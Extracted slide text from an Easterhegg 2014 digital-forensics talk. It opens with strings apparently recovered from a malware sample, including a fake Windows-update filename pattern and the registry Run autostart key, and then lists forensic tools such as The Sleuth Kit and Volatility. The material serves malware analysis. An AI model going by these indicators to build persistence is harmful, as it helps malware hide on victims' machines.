     0   explorer.exe 000000011C60   000000411C60      0   SoftwareMicrosoftWindows NTS%08X 000000011CEB   000000411CEB      0   sKB%08d.exe 000000011D08   000000411D08      0   SoftwareMicrosoftWindowsCurrentVersionRun
  • 48. xhr Easterhegg 2014 50 Selected Tools
  • 49. xhr Easterhegg 2014 51 The Sleuth Kit http://www.sleuthkit.org
  • 50. xhr Easterhegg 2014 52 The Volatility Framework https://code.google.com/p/volatility/
  • 52. xhr Easterhegg 2014 54 Q & A xhr xhr giessen.ccc.de @ @_xhr_